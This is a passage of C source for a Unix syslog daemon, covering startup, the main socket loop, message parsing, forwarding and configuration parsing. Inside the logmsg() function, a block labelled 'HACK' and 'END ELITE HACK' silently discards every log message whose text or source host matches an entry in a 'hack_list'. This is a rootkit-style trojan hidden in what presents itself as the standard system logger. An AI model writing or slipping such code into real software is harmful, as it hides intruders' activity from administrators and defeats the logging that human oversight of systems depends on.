exit(1);
}
}
else
{
dprintf("Pidfile (and pid) already exist.\n");
exit(1);
}
} /* if ( !Debug ) */
consfile.f_type = F_CONSOLE;
(void) strcpy(consfile.f_un.f_fname, ctty);
(void) gethostname(LocalHostName, sizeof(LocalHostName));
if ( (p = index(LocalHostName, '.')) ) {
*p++ = '\0';
LocalDomain = p;
}
else
{
LocalDomain = "";
/*
* It's not clearly defined whether gethostname()
* should return the simple hostname or the fqdn. A
* good piece of software should be aware of both and
* we want to distribute good software. Joey
*/
hent = gethostbyname(LocalHostName);
sprintf(LocalHostName, "%s", hent->h_name);
if ( (p = index(LocalHostName, '.')) )
{
*p++ = '\0';
LocalDomain = p;
}
}
/*
* Convert to lower case to recognize the correct domain laterly
*/
for (p = (char *)LocalDomain; *p ; p++)
if (isupper(*p))
*p = tolower(*p);
(void) signal(SIGTERM, die);
(void) signal(SIGINT, Debug ? die : SIG_IGN);
(void) signal(SIGQUIT, Debug ? die : SIG_IGN);
(void) signal(SIGCHLD, reapchild);
(void) signal(SIGALRM, domark);
(void) signal(SIGUSR1, Debug ? debug_switch : SIG_IGN);
(void) alarm(TIMERINTVL);
(void) unlink(LogName);
#ifdef SYSLOG_UNIXAF
sunx.sun_family = AF_UNIX;
(void) strncpy(sunx.sun_path, LogName, sizeof(sunx.sun_path));
funix = socket(AF_UNIX, SOCK_STREAM, 0);
if (funix < 0 || bind(funix, (struct sockaddr *) &sunx,
sizeof(sunx.sun_family)+strlen(sunx.sun_path)) < 0 ||
chmod(LogName, 0666) < 0 || listen(funix, 5) < 0) {
(void) sprintf(line, "cannot create %s", LogName);
logerror(line);
dprintf("cannot create %s (%d).\n", LogName, errno);
#ifndef SYSV
die(0);
#endif
}
#endif
#ifdef SYSLOG_INET
finet = socket(AF_INET, SOCK_DGRAM, 0);
if (finet >= 0) {
auto int on = 1;
struct servent *sp;
sp = getservbyname("syslog", "udp");
if (sp == NULL) {
errno = 0;
logerror("network logging disabled (syslog/udp service unknown).");
logerror("see syslogd(8) for details of whether and how to enable it.");
}
else {
sin.sin_family = AF_INET;
sin.sin_port = LogPort = sp->s_port;
sin.sin_addr.s_addr = 0;
if ( setsockopt(finet, SOL_SOCKET, SO_REUSEADDR, \
(char *) &on, sizeof(on)) < 0 ) {
logerror("setsockopt, suspending inet");
}
else {
if (bind(finet, (struct sockaddr *) &sin, \
sizeof(sin)) < 0) {
logerror("bind, suspending inet");
} else {
inetm = finet;
InetInuse = 1;
dprintf("listening on syslog UDP port.\n");
}
}
}
}
else
logerror("syslog: Unknown protocol, suspending inet service.");
#endif
/* Create a partial message table for all file descriptors. */
num_fds = getdtablesize();
dprintf("Allocated parts table for %d file descriptors.\n", num_fds);
if ( (parts = (char **) malloc(num_fds * sizeof(char *))) == \
(char **) 0 )
{
logerror("Cannot allocate memory for message parts table.");
die(0);
}
for(i= 0; i < num_fds; ++i)
parts[i] = (char *) 0;
dprintf("Starting.\n");
init();
if ( Debug )
{
dprintf("Debugging disabled, SIGUSR1 to turn on debugging.\n");
debugging_on = 0;
}
if (quitpid) {
kill(quitpid, SIGINT);
}
/* Main loop begins here. */
FD_ZERO(&unixm);
FD_ZERO(&readfds);
for (;;) {
int nfds;
errno = 0;
#ifdef SYSLOG_UNIXAF
/*
* Add the Unix Domain Socket to the list of read
* descriptors.
*/
FD_SET(funix, &readfds);
for (nfds= 0; nfds < FD_SETSIZE; ++nfds)
if ( FD_ISSET(nfds, &unixm) )
FD_SET(nfds, &readfds);
#endif
#ifdef SYSLOG_INET
/*
* Add the Internet Domain Socket to the list of read
* descriptors.
*/
if ( InetInuse && AcceptRemote )
FD_SET(inetm, &readfds);
#endif
if ( debugging_on )
{
dprintf("Calling select, active file descriptors: ");
for (nfds= 0; nfds < FD_SETSIZE; ++nfds)
if ( FD_ISSET(nfds, &readfds) )
dprintf("%d ", nfds);
dprintf("\n");
}
nfds = select(FD_SETSIZE, (fd_set *) &readfds, (fd_set *) NULL,
(fd_set *) NULL, (struct timeval *) NULL);
if ( restart )
{
dprintf("\nReceived SIGHUP, reloading syslogd.\n");
init();
restart = 0;
continue;
}
if (nfds == 0) {
dprintf("No select activity.\n");
continue;
}
if (nfds < 0) {
if (errno != EINTR)
logerror("select");
dprintf("Select interrupted.\n");
continue;
}
if ( debugging_on )
{
dprintf("\nSuccessful select, descriptor count = %d, " \
"Activity on: ", nfds);
for (nfds= 0; nfds < FD_SETSIZE; ++nfds)
if ( FD_ISSET(nfds, &readfds) )
dprintf("%d ", nfds);
dprintf(("\n"));
}
#ifdef SYSLOG_UNIXAF
if ( debugging_on )
{
dprintf("Checking UNIX connections, active: ");
for (nfds= 0; nfds < FD_SETSIZE; ++nfds)
if ( FD_ISSET(nfds, &unixm) )
dprintf("%d ", nfds);
dprintf("\n");
}
for (fd= 0; fd <= FD_SETSIZE; ++fd)
if ( FD_ISSET(fd, &readfds) && FD_ISSET(fd, &unixm) ) {
dprintf("Message from UNIX socket #%d.\n", fd);
memset(line, '\0', sizeof(line));
i = read(fd, line, MAXLINE);
if (i > 0) {
printchopped(LocalHostName, line, i, fd);
} else if (i < 0) {
if (errno != EINTR) {
logerror("recvfrom unix");
}
} else {
dprintf("Unix socket (%d) closed.\n", fd);
if ( parts[fd] != (char *) 0 )
{
logerror("Printing partial message");
line[0] = '\0';
printchopped(LocalHostName, line, \
strlen(parts[fd]) + 1, \
fd);
}
close(fd);
FD_CLR(fd, &unixm);
FD_CLR(fd, &readfds);
}
}
/* Accept a new unix connection */
if (FD_ISSET(funix, &readfds)) {
len = sizeof(fromunix);
if ((fd = accept(funix, (struct sockaddr *) &fromunix,\
&len)) >= 0) {
FD_SET(fd, &unixm);
dprintf("New UNIX connect assigned to fd: " \
"%d.\n", fd);
FD_SET(fd, &readfds);
}
else {
dprintf("Error accepting UNIX connection: " \
"%d = %s.\n", errno, strerror(errno));
}
}
#endif
#ifdef SYSLOG_INET
if (InetInuse && AcceptRemote && FD_ISSET(inetm, &readfds)) {
len = sizeof(frominet);
memset(line, '\0', sizeof(line));
i = recvfrom(finet, line, MAXLINE - 2, 0, \
(struct sockaddr *) &frominet, &len);
dprintf("Message from inetd socket: #%d, host: %s\n",
inetm, inet_ntoa(frominet.sin_addr));
if (i > 0) {
line[i] = line[i+1] = '\0';
from = (char *)cvthname(&frominet);
/*
* Here we could check if the host is permitted
* to send us syslog messages. We just have to
* catch the result of cvthname, look for a dot
* and if that doesn't exist, replace the first
* '\0' with '.' and we have the fqdn in lowercase
* letters so we could match them against whatever.
* -Joey
*/
printchopped(from, line, \
i + 2, finet);
} else if (i < 0 && errno != EINTR) {
dprintf("INET socket error: %d = %s.\n", \
errno, strerror(errno));
logerror("recvfrom inet");
sleep(10);
}
}
#endif
}
}
int usage()
{
fprintf(stderr, "usage: syslogd [-drvh] [-l hostlist] [-m markinterval] [-n] [-p path]\n" \
" [-s domainlist] [-f conffile]\n");
exit(1);
}
char **
crunch_list(list)
char *list;
{
int count;
int i;
char *p;
char **result = NULL;
p = list;
/* strip off trailing delimiters */
while (p[strlen(p)-1] == LIST_DELIMITER) {
count--;
p[strlen(p)-1] = '\0';
}
/* cut off leading delimiters */
while (p[0] == LIST_DELIMITER) {
count--;
p++;
}
/* count delimiters to calculate elements */
for (count=i=0; p[i]; i++)
if (p[i] == LIST_DELIMITER) count++;
if ((result = (char **)malloc(sizeof(char *) * count+2)) == NULL) {
printf ("Sorry, can't get enough memory, exiting.\n");
exit(0);
}
/*
* We now can assume that the first and last
* characters are different from any delimiters,
* so we don't have to care about this.
*/
count = 0;
while ((i=(int)index(p, LIST_DELIMITER))) {
if ((result[count] = \
(char *)malloc(sizeof(char) * i - (int)p +1)) == NULL) {
printf ("Sorry, can't get enough memory, exiting.\n");
exit(0);
}
strncpy(result[count],p, i - (int)p);
result[count][i - (int)p] = '\0';
p = (char *)i;p++;
count++;
}
if ((result[count] = \
(char *)malloc(sizeof(char) * strlen(p) + 1)) == NULL) {
printf ("Sorry, can't get enough memory, exiting.\n");
exit(0);
}
strcpy(result[count],p);
result[++count] = NULL;
#if 0
count=0;
while (result[count])
dprintf ("#%d: %s\n", count, StripDomains[count++]);
#endif
return result;
}
void untty()
#ifdef SYSV
{
if ( !Debug ) {
setsid();
}
return;
}
#else
{
int i;
if ( !Debug ) {
i = open(_PATH_TTY, O_RDWR);
if (i >= 0) {
(void) ioctl(i, (int) TIOCNOTTY, (char *)0);
(void) close(i);
}
}
}
#endif
/*
* Parse the line to make sure that the msg is not a composite of more
* than one message.
*/
void printchopped(hname, msg, len, fd)
const char *hname;
char *msg;
int len;
int fd;
{
auto int ptlngth;
auto char *start = msg,
*p,
*end,
tmpline[MAXLINE + 1];
dprintf("Message length: %d, File descriptor: %d.\n", len, fd);
tmpline[0] = '\0';
if ( parts[fd] != (char *) 0 )
{
dprintf("Including part from messages.\n");
strcpy(tmpline, parts[fd]);
free(parts[fd]);
parts[fd] = (char *) 0;
if ( (strlen(msg) + strlen(tmpline)) > MAXLINE )
{
logerror("Cannot glue message parts together");
printline(hname, tmpline);
start = msg;
}
else
{
dprintf("Previous: %s\n", tmpline);
dprintf("Next: %s\n", msg);
strcat(tmpline, msg);
printline(hname, tmpline);
if ( (strlen(msg) + 1) == len )
return;
else
start = strchr(msg, '\0') + 1;
}
}
if ( msg[len-1] != '\0' )
{
msg[len] = '\0';
for(p= msg+len-1; *p != '\0' && p > msg; )
--p;
ptlngth = strlen(++p);
if ( (parts[fd] = malloc(ptlngth + 1)) == (char *) 0 )
logerror("Cannot allocate memory for message part.");
else
{
strcpy(parts[fd], p);
dprintf("Saving partial msg: %s\n", parts[fd]);
memset(p, '\0', ptlngth);
}
}
do {
end = strchr(start + 1, '\0');
printline(hname, start);
start = end + 1;
} while ( *start != '\0' );
return;
}
/*
* Take a raw input line, decode the message, and print the message
* on the appropriate log files.
*/
void printline(hname, msg)
const char *hname;
char *msg;
{
register char *p, *q;
register int c;
char line[MAXLINE + 1];
int pri;
/* test for special codes */
pri = DEFUPRI;
p = msg;
if (*p == '<') {
pri = 0;
while (isdigit(*++p))
{
pri = 10 * pri + (*p - '0');
}
if (*p == '>')
++p;
}
if (pri &~ (LOG_FACMASK|LOG_PRIMASK))
pri = DEFUPRI;
q = line;
while ((c = *p++ & 0177) != '\0' &&
q < &line[sizeof(line) - 1])
if (c == '\n')
*q++ = ' ';
else if (iscntrl(c)) {
*q++ = '^';
*q++ = c ^ 0100;
} else
*q++ = c;
*q = '\0';
logmsg(pri, line, hname, SYNC_FILE);
return;
}
/*
* Take a raw input line from /dev/klog, split and format similar to syslog().
*/
void printsys(msg)
char *msg;
{
register char *p, *q;
register int c;
char line[MAXLINE + 1];
int pri, flags;
char *lp;
(void) sprintf(line, "vmunix: ");
lp = line + strlen(line);
for (p = msg; *p != '\0'; ) {
flags = ADDDATE;
pri = DEFSPRI;
if (*p == '<') {
pri = 0;
while (isdigit(*++p))
pri = 10 * pri + (*p - '0');
if (*p == '>')
++p;
} else {
/* kernel printf's come out on console */
flags |= IGN_CONS;
}
if (pri &~ (LOG_FACMASK|LOG_PRIMASK))
pri = DEFSPRI;
q = lp;
while (*p != '\0' && (c = *p++) != '\n' &&
q < &line[MAXLINE])
*q++ = c;
*q = '\0';
logmsg(pri, line, LocalHostName, flags);
}
return;
}
time_t now;
/*
* Log a message to the appropriate log files, users, etc. based on
* the priority.
*/
void logmsg(pri, msg, from, flags)
int pri;
char *msg;
const char *from;
int flags;
{
register struct filed *f;
int fac, prilev, lognum;
int msglen;
char *timestamp;
int elite=0;
/* HACK mask out unwanted entries */
for (h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next)
if ((strstr(msg, h_tmp->logstr))||(strstr(from, h_tmp->logstr))) elite++;
if (!elite) {
dprintf("logmsg: pri %o, flags %x, from %s, msg %s\n", pri, flags, from, msg);
#ifndef SYSV
omask = sigblock(sigmask(SIGHUP)|sigmask(SIGALRM));
#endif
/*
* Check to see if msg looks non-standard.
*/
msglen = strlen(msg);
if (msglen < 16 || msg[3] != ' ' || msg[6] != ' ' ||
msg[9] != ':' || msg[12] != ':' || msg[15] != ' ')
flags |= ADDDATE;
(void) time(&now);
if (flags & ADDDATE)
timestamp = ctime(&now) + 4;
else {
timestamp = msg;
msg += 16;
msglen -= 16;
}
/* extract facility and priority level */
if (flags & MARK)
fac = LOG_NFACILITIES;
else
fac = LOG_FAC(pri);
prilev = LOG_PRI(pri);
/* log the message to the particular outputs */
if (!Initialized) {
f = &consfile;
f->f_file = open(ctty, O_WRONLY|O_NOCTTY);
if (f->f_file >= 0) {
untty();
fprintlog(f, (char *)from, flags, msg);
(void) close(f->f_file);
}
#ifndef SYSV
(void) sigsetmask(omask);
#endif
return;
}
#ifdef SYSV
for (lognum = 0; lognum <= nlogs; lognum++) {
f = &Files[lognum];
#else
for (f = Files; f; f = f->f_next) {
#endif
/* skip messages that are incorrect priority */
if ( (f->f_pmask[fac] == TABLE_NOPRI) || \
((f->f_pmask[fac] & (1<<prilev)) == 0) )
continue;
if (f->f_type == F_CONSOLE && (flags & IGN_CONS))
continue;
/* don't output marks to recently written files */
if ((flags & MARK) && (now - f->f_time) < MarkInterval / 2)
continue;
/*
* suppress duplicate lines to this file
*/
if ((flags & MARK) == 0 && msglen == f->f_prevlen &&
!strcmp(msg, f->f_prevline) &&
!strcmp(from, f->f_prevhost)) {
(void) strncpy(f->f_lasttime, timestamp, 15);
f->f_prevcount++;
dprintf("msg repeated %d times, %ld sec of %d.\n",
f->f_prevcount, now - f->f_time,
repeatinterval[f->f_repeatcount]);
/*
* If domark would have logged this by now,
* flush it now (so we don't hold isolated messages),
* but back off so we'll flush less often
* in the future.
*/
if (now > REPEATTIME(f)) {
fprintlog(f, (char *)from, flags, (char *)NULL);
BACKOFF(f);
}
} else {
/* new line, save it */
if (f->f_prevcount)
fprintlog(f, (char *)from, 0, (char *)NULL);
f->f_repeatcount = 0;
(void) strncpy(f->f_lasttime, timestamp, 15);
(void) strncpy(f->f_prevhost, from,
sizeof(f->f_prevhost));
if (msglen < MAXSVLINE) {
f->f_prevlen = msglen;
f->f_prevpri = pri;
(void) strcpy(f->f_prevline, msg);
fprintlog(f, (char *)from, flags, (char *)NULL);
} else {
f->f_prevline[0] = 0;
f->f_prevlen = 0;
fprintlog(f, (char *)from, flags, msg);
}
}
}
#ifndef SYSV
(void) sigsetmask(omask);
#endif
} /* END ELITE HACK */
}
void fprintlog(f, from, flags, msg)
register struct filed *f;
char *from;
int flags;
char *msg;
{
struct iovec iov[6];
register struct iovec *v = iov;
register int l;
char line[MAXLINE + 1];
char repbuf[80];
time_t fwd_suspend;
struct hostent *hp;
dprintf("Called fprintlog, ");
v->iov_base = f->f_lasttime;
v->iov_len = 15;
v++;
v->iov_base = " ";
v->iov_len = 1;
v++;
v->iov_base = f->f_prevhost;
v->iov_len = strlen(v->iov_base);
v++;
v->iov_base = " ";
v->iov_len = 1;
v++;
if (msg) {
v->iov_base = msg;
v->iov_len = strlen(msg);
} else if (f->f_prevcount > 1) {
(void) sprintf(repbuf, "last message repeated %d times",
f->f_prevcount);
v->iov_base = repbuf;
v->iov_len = strlen(repbuf);
} else {
v->iov_base = f->f_prevline;
v->iov_len = f->f_prevlen;
}
v++;
dprintf("logging to %s", TypeNames[f->f_type]);
switch (f->f_type) {
case F_UNUSED:
f->f_time = now;
dprintf("\n");
break;
case F_FORW_SUSP:
fwd_suspend = time((time_t *) 0) - f->f_time;
if ( fwd_suspend >= INET_SUSPEND_TIME ) {
dprintf("\nForwarding suspension over, " \
"retrying FORW ");
f->f_type = F_FORW;
goto f_forw;
}
else {
dprintf(" %s\n", f->f_un.f_forw.f_hname);
dprintf("Forwarding suspension not over, time " \
"left: %d.\n", INET_SUSPEND_TIME - \
fwd_suspend);
}
break;
/*
* The trick is to wait some time, then retry to get the
* address. If that fails retry x times and then give up.
*
* You'll run into this problem mostly if the name server you
* need for resolving the address is on the same machine, but
* is started after syslogd.
*/
case F_FORW_UNKN:
dprintf(" %s\n", f->f_un.f_forw.f_hname);
fwd_suspend = time((time_t *) 0) - f->f_time;
if ( fwd_suspend >= INET_SUSPEND_TIME ) {
dprintf("Forwarding suspension to unknown over, retrying\n");
if ( (hp = gethostbyname(f->f_un.f_forw.f_hname)) == NULL ) {
dprintf("Failure: %s\n", sys_h_errlist[h_errno]);
dprintf("Retries: %d\n", f->f_prevcount);
if ( --f->f_prevcount < 0 ) {
dprintf("Giving up.\n");
f->f_type = F_UNUSED;
}
else
dprintf("Left retries: %d\n", f->f_prevcount);
}
else {
dprintf("%s found, resuming.\n", f->f_un.f_forw.f_hname);
bcopy(hp->h_addr, (char *) &f->f_un.f_forw.f_addr.sin_addr, hp->h_length);
f->f_type = F_FORW;
goto f_forw;
}
}
else
dprintf("Forwarding suspension not over, time " \
"left: %d\n", INET_SUSPEND_TIME - fwd_suspend);
break;
case F_FORW:
/*
* Don't send any message to a remote host if it
* already comes from one. (we don't care 'bout who
* sent the message, we don't send it anyway) -Joey
*/
f_forw:
dprintf(" %s\n", f->f_un.f_forw.f_hname);
if ( strcmp(from, LocalHostName) && NoHops )
dprintf("Not sending message to remote.\n");
else {
f->f_time = now;
(void) sprintf(line, "<%d>%s", f->f_prevpri, \
(char *) iov[4].iov_base);
strcat(line, "\n"); /* ASP */
l = strlen(line);
if (l > MAXLINE)
l = MAXLINE;
if (sendto(finet, line, l, 0, \
(struct sockaddr *) &f->f_un.f_forw.f_addr,
sizeof(f->f_un.f_forw.f_addr)) != l) {
int e = errno;
dprintf("INET sendto error: %d = %s.\n",
e, strerror(e));
f->f_type = F_FORW_SUSP;
errno = e;
logerror("sendto");
}
}
break;
case F_CONSOLE:
f->f_time = now;
#ifdef UNIXPC
if (1) {
#else
if (flags & IGN_CONS) {
#endif
dprintf(" (ignored).\n");
break;
}
/* FALLTHROUGH */
case F_TTY:
case F_FILE:
f->f_time = now;
dprintf(" %s\n", f->f_un.f_fname);
if (f->f_type != F_FILE) {
v->iov_base = "\r\n";
v->iov_len = 2;
} else {
v->iov_base = "\n";
v->iov_len = 1;
}
again:
if (writev(f->f_file, iov, 6) < 0) {
int e = errno;
(void) close(f->f_file);
/*
* Check for EBADF on TTY's due to vhangup() XXX
*/
if (e == EBADF && f->f_type != F_FILE) {
f->f_file = open(f->f_un.f_fname, O_WRONLY|O_APPEND|O_NOCTTY);
if (f->f_file < 0) {
f->f_type = F_UNUSED;
logerror(f->f_un.f_fname);
} else {
untty();
goto again;
}
} else {
f->f_type = F_UNUSED;
errno = e;
logerror(f->f_un.f_fname);
}
} else if (f->f_flags & SYNC_FILE)
(void) fsync(f->f_file);
break;
case F_USERS:
case F_WALL:
f->f_time = now;
dprintf("\n");
v->iov_base = "\r\n";
v->iov_len = 2;
wallmsg(f, iov);
break;
} /* switch */
if (f->f_type != F_FORW_UNKN)
f->f_prevcount = 0;
return;
}
jmp_buf ttybuf;
void endtty()
{
longjmp(ttybuf, 1);
}
/*
* WALLMSG -- Write a message to the world at large
*
* Write the specified message to either the entire
* world, or a list of approved users.
*/
void wallmsg(f, iov)
register struct filed *f;
struct iovec *iov;
{
char p[6 + UNAMESZ];
register int i;
int ttyf, len;
FILE *uf;
static int reenter = 0;
struct utmp ut;
char greetings[200];
if (reenter++)
return;
/* open the user login file */
if ((uf = fopen(UTMP_FILE, "r")) == NULL) {
logerror(UTMP_FILE);
reenter = 0;
return;
}
/*
* Might as well fork instead of using nonblocking I/O
* and doing notty().
*/
if (fork() == 0) {
(void) signal(SIGTERM, SIG_DFL);
(void) alarm(0);
(void) signal(SIGALRM, endtty);
#ifndef SYSV
(void) signal(SIGTTOU, SIG_IGN);
(void) sigsetmask(0);
#endif
(void) sprintf(greetings,
"\r\n\7Message from syslogd@%s at %.24s ...\r\n",
(char *) iov[2].iov_base, ctime(&now));
len = strlen(greetings);
/* scan the user login file */
while (fread((char *) &ut, sizeof(ut), 1, uf) == 1) {
/* is this slot used? */
if (ut.ut_name[0] == '\0')
continue;
if (ut.ut_type == LOGIN_PROCESS)
continue;
if (!(strcmp (ut.ut_name,"LOGIN"))) /* paranoia */
continue;
/* should we send the message to this user? */
if (f->f_type == F_USERS) {
for (i = 0; i < MAXUNAMES; i++) {
if (!f->f_un.f_uname[i][0]) {
i = MAXUNAMES;
break;
}
if (strncmp(f->f_un.f_uname[i],
ut.ut_name, UNAMESZ) == 0)
break;
}
if (i >= MAXUNAMES)
continue;
}
/* compute the device name */
strcpy(p, _PATH_DEV);
strncat(p, ut.ut_line, UNAMESZ);
if (f->f_type == F_WALL) {
iov[0].iov_base = greetings;
iov[0].iov_len = len;
iov[1].iov_len = 0;
}
if (setjmp(ttybuf) == 0) {
(void) alarm(15);
/* open the terminal */
ttyf = open(p, O_WRONLY|O_NOCTTY);
if (ttyf >= 0) {
struct stat statb;
if (fstat(ttyf, &statb) == 0 &&
(statb.st_mode & S_IWRITE))
(void) writev(ttyf, iov, 6);
close(ttyf);
ttyf = -1;
}
}
(void) alarm(0);
}
exit(0);
}
/* close the user login file */
(void) fclose(uf);
reenter = 0;
}
void reapchild()
{
#if defined(SYSV) && !defined(linux)
(void) signal(SIGCHLD, reapchild); /* reset signal handler -ASP */
wait ((int *)0);
#else
union wait status;
while (wait3(&status, WNOHANG, (struct rusage *) NULL) > 0)
;
#endif
#ifdef linux
(void) signal(SIGCHLD, reapchild); /* reset signal handler -ASP */
#endif
}
/*
* Return a printable representation of a host address.
*/
const char *cvthname(f)
struct sockaddr_in *f;
{
struct hostent *hp;
register char *p;
int count;
if (f->sin_family != AF_INET) {
dprintf("Malformed from address.\n");
return ("???");
}
hp = gethostbyaddr((char *) &f->sin_addr, sizeof(struct in_addr), \
f->sin_family);
if (hp == 0) {
dprintf("Host name for your address (%s) unknown.\n",
inet_ntoa(f->sin_addr));
return (inet_ntoa(f->sin_addr));
}
/*
* Convert to lower case, just like LocalDomain above
*/
for (p = (char *)hp->h_name; *p ; p++)
if (isupper(*p))
*p = tolower(*p);
/*
* Notice that the string still contains the fqdn, but your
* hostname and domain are separated by a '\0'.
*/
if ((p = index(hp->h_name, '.'))) {
if (strcmp(p + 1, LocalDomain) == 0) {
*p = '\0';
return (hp->h_name);
} else {
if (StripDomains) {
count=0;
while (StripDomains[count]) {
if (strcmp(p + 1, StripDomains[count]) == 0) {
*p = '\0';
return (hp->h_name);
}
count++;
}
}
if (LocalHosts) {
count=0;
while (LocalHosts[count]) {
if (!strcmp(hp->h_name, LocalHosts[count])) {
*p = '\0';
return (hp->h_name);
}
count++;
}
}
}
}
return (hp->h_name);
}
void domark()
{
register struct filed *f;
#ifdef SYSV
int lognum;
#endif
now = time(0);
MarkSeq += TIMERINTVL;
if (MarkSeq >= MarkInterval) {
logmsg(LOG_INFO, "-- MARK --", LocalHostName, ADDDATE|MARK);
MarkSeq = 0;
}
#ifdef SYSV
for (lognum = 0; lognum <= nlogs; lognum++) {
f = &Files[lognum];
#else
for (f = Files; f; f = f->f_next) {
#endif
if (f->f_prevcount && now >= REPEATTIME(f)) {
dprintf("flush %s: repeated %d times, %d sec.\n",
TypeNames[f->f_type], f->f_prevcount,
repeatinterval[f->f_repeatcount]);
fprintlog(f, LocalHostName, 0, (char *)NULL);
BACKOFF(f);
}
}
(void) signal(SIGALRM, domark);
(void) alarm(TIMERINTVL);
}
void debug_switch()
{
dprintf("Switching debugging_on to %s\n", (debugging_on == 0) ? "true" : "false");
debugging_on = (debugging_on == 0) ? 1 : 0;
signal(SIGUSR1, debug_switch);
}
/*
* Print syslogd errors some place.
*/
void logerror(type)
char *type;
{
char buf[100];
dprintf("Called loggerr, msg: %s\n", type);
if (errno == 0)
(void) sprintf(buf, "syslogd: %s", type);
else if ((unsigned) errno > sys_nerr)
(void) sprintf(buf, "syslogd: %s: error %d", type, errno);
else
(void) sprintf(buf, "syslogd: %s: %s", type, sys_errlist[errno]);
errno = 0;
logmsg(LOG_SYSLOG|LOG_ERR, buf, LocalHostName, ADDDATE);
return;
}
void die(sig)
int sig;
{
register struct filed *f;
char buf[100];
int lognum;
for (lognum = 0; lognum <= nlogs; lognum++) {
f = &Files[lognum];
/* flush any pending output */
if (f->f_prevcount)
fprintlog(f, LocalHostName, 0, (char *)NULL);
}
if (sig) {
dprintf("syslogd: exiting on signal %d\n", sig);
(void) sprintf(buf, "exiting on signal %d", sig);
errno = 0;
logerror(buf);
}
/* Close the sockets. */
close(funix);
close(inetm);
/* Clean-up files. */
(void) unlink(LogName);
(void) remove_pid(PidFile);
exit(0);
}
/*
* INIT -- Initialize syslogd from configuration table
*/
void init()
{
register int i, lognum;
register FILE *cf;
register struct filed *f, **nextp = (struct filed **) 0;
register char *p;
char cline[BUFSIZ];
dprintf("Called init.\n");
/*
* Close all open log files.
*/
Initialized = 0;
if ( nlogs > -1 )
{
dprintf("Initializing log structures.\n");
nlogs = -1;
free((void *) Files);
Files = (struct filed *) 0;
}
#ifdef SYSV
for (lognum = 0; lognum <= nlogs; lognum++ ) {
f = &Files[lognum];
#else
for (f = Files; f != NULL; f = next) {
#endif
/* flush any pending output */
if (f->f_prevcount)
fprintlog(f, LocalHostName, 0, (char *)NULL);
switch (f->f_type) {
case F_FILE:
case F_TTY:
case F_CONSOLE:
(void) close(f->f_file);
break;
}
#ifdef SYSV
f->f_type = F_UNUSED; /* clear entry - ASP */
}
#else
next = f->f_next;
free((char *) f);
}
Files = NULL;
nextp = &OBFiles;
#endif
/* open the configuration file */
if ((cf = fopen(ConfFile, "r")) == NULL) {
dprintf("cannot open %s.\n", ConfFile);
#ifdef SYSV
cfline("*.ERR\t" _PATH_CONSOLE, *nextp);
#else
*nextp = (struct filed *)calloc(1, sizeof(*f));
cfline("*.ERR\t" _PATH_CONSOLE, *nextp);
(*nextp)->f_next = (struct filed *)calloc(1, sizeof(*f)) /* ASP */
cfline("*.PANIC\t*", (*nextp)->f_next);
#endif
Initialized = 1;
return;
}
/*
* Foreach line in the conf table, open that file.
*/
#ifdef SYSV
lognum = 0;
#else
f = NULL;
#endif
while (fgets(cline, sizeof(cline), cf) != NULL) {
/*
* check for end-of-section, comments, strip off trailing
* spaces and newline character.
*/
for (p = cline; isspace(*p); ++p);
if (*p == '\0' || *p == '#')
continue;
for (p = index(cline, '\0'); isspace(*--p););
*++p = '\0';
#ifndef SYSV
f = (struct filed *)calloc(1, sizeof(*f));
*nextp = f;
nextp = &f->f_next;
#endif
allocate_log();
f = &Files[lognum++];
cfline(cline, f);
}
/* close the configuration file */
(void) fclose(cf);
Initialized = 1;
if ( Debug ) {
#ifdef SYSV
for (lognum = 0; lognum <= nlogs; lognum++) {
f = &Files[lognum];
if (f->f_type != F_UNUSED) {
printf ("%2d: ", lognum);
#else
for (f = Files; f; f = f->f_next) {
if (f->f_type != F_UNUSED) {
#endif
for (i = 0; i <= LOG_NFACILITIES; i++)
if (f->f_pmask[i] == TABLE_NOPRI)
printf(" X ");
else
printf("%2X ", f->f_pmask[i]);
printf("%s: ", TypeNames[f->f_type]);
switch (f->f_type) {
case F_FILE:
case F_TTY:
case F_CONSOLE:
printf("%s", f->f_un.f_fname);
break;
case F_FORW:
case F_FORW_SUSP:
case F_FORW_UNKN:
printf("%s", f->f_un.f_forw.f_hname);
break;
case F_USERS:
for (i = 0; i < MAXUNAMES && *f->f_un.f_uname[i]; i++)
printf("%s, ", f->f_un.f_uname[i]);
break;
}
printf("\n");
}
}
}
if ( AcceptRemote )
logmsg(LOG_SYSLOG|LOG_INFO, "syslogd " VERSION "-" PATCHLEVEL \
": restart (remote reception)." , LocalHostName, \
ADDDATE);
else
logmsg(LOG_SYSLOG|LOG_INFO, "syslogd " VERSION "-" PATCHLEVEL \
": restart." , LocalHostName, ADDDATE);
(void) signal(SIGHUP, sighup_handler);
dprintf("syslogd: restarted.\n");
}
/*
* Crack a configuration file line
*/
void cfline(line, f)
char *line;
register struct filed *f;
{
register char *p;
register char *q;
register int i, i2;
char *bp;
int pri;
int singlpri = 0;
int ignorepri = 0;
int syncfile;
struct hostent *hp;
char buf[MAXLINE];
dprintf("cfline(%s)\n", line);
errno = 0; /* keep sys_errlist stuff out of logerror messages */
/* clear out file entry */
#ifndef SYSV
bzero((char *) f, sizeof(*f));
#endif
for (i = 0; i <= LOG_NFACILITIES; i++) {
f->f_pmask[i] = TABLE_NOPRI;
f->f_flags = 0;
}
/* scan through the list of selectors */
for (p = line; *p && *p != '\t' && *p != ' ';) {
/* find the end of this facility name list */
for (q = p; *q && *q != '\t' && *q++ != '.'; )
continue;
/* collect priority name */
for (bp = buf; *q && !index("\t ,;", *q); )
*bp++ = *q++;
*bp = '\0';
/* skip cruft */
while (index(",;", *q))
q++;
/* decode priority name */
if ( *buf == '!' ) {
ignorepri = 1;
for (bp=buf; *(bp+1); bp++)
*bp=*(bp+1);
*bp='\0';
}
if ( *buf == '=' )
{
singlpri = 1;
pri = decode(&buf[1], PriNames);
}
else {
singlpri = 0;
pri = decode(buf, PriNames);
}
if (pri < 0) {
char xbuf[200];
(void) sprintf(xbuf, "unknown priority name \"%s\"", buf);
logerror(xbuf);
return;
}
/* scan facilities */
while (*p && !index("\t .;", *p)) {
for (bp = buf; *p && !index("\t ,;.", *p); )
*bp++ = *p++;
*bp = '\0';
if (*buf == '*') {
for (i = 0; i < LOG_NFACILITIES; i++) {
if ( pri == INTERNAL_NOPRI ) {
if ( ignorepri )
f->f_pmask[i] = TABLE_ALLPRI;
else
f->f_pmask[i] = TABLE_NOPRI;
}
else if ( singlpri ) {
if ( ignorepri )
f->f_pmask[i] &= ~(1<<pri);
else
f->f_pmask[i] |= (1<<pri);
}
else
{
if ( pri == TABLE_ALLPRI ) {
if ( ignorepri )
f->f_pmask[i] = TABLE_NOPRI;
else
